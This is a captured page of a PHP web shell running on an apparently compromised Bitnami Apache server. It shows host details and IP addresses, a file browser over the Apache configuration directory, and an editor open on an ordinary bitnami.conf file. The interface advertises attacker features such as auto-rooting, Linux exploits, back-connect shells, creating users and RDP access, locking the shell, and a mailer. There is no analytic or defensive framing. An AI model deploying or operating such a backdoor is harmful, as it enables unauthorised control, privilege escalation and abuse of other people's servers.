Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
conf /
bitnami /
[ HOME SHELL ]
Name
Size
Permission
Action
certs
[ DIR ]
drwxr-xr-x
memory
[ DIR ]
drwxrwxr-x
bitnami-ssl.conf
1.5
KB
-rw-r--r--
bitnami-ssl.conf.back.20250123...
948
B
-rw-rw-r--
bitnami.conf
1.37
KB
-rw-r--r--
bitnami.conf.back.202501231019
469
B
-rw-rw-r--
httpd.conf
700
B
-rw-rw-r--
php-fpm.conf
292
B
-rw-r--r--
phpmyadmin.conf
406
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bitnami.conf
# Default Virtual Host configuration. # Let Apache know we're behind a SSL reverse proxy SetEnvIf X-Forwarded-Proto https HTTPS=on <VirtualHost _default_:80> DocumentRoot "/opt/bitnami/apache/htdocs" # BEGIN: Configuration for letsencrypt Include "/opt/bitnami/apps/letsencrypt/conf/httpd-prefix.conf" # END: Configuration for letsencrypt # BEGIN: Support domain renewal when using mod_proxy without Location <IfModule mod_proxy.c> ProxyPass /.well-known ! </IfModule> # END: Support domain renewal when using mod_proxy without Location # BEGIN: Enable HTTP to HTTPS redirection RewriteEngine On RewriteCond %{HTTPS} !=on RewriteCond %{HTTP_HOST} !^localhost RewriteCond %{HTTP_HOST} !^[0-9]+.[0-9]+.[0-9]+.[0-9]+(:[0-9]+)?$ RewriteCond %{REQUEST_URI} !^/\.well-known RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [R,L] # END: Enable HTTP to HTTPS redirection <Directory "/opt/bitnami/apache/htdocs"> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> # Error Documents ErrorDocument 503 /503.html # BEGIN: Support domain renewal when using mod_proxy within Location <Location /.well-known> <IfModule mod_proxy.c> ProxyPass ! </IfModule> </Location> # END: Support domain renewal when using mod_proxy within Location </VirtualHost> Include "/opt/bitnami/apache/conf/bitnami/bitnami-ssl.conf"
Close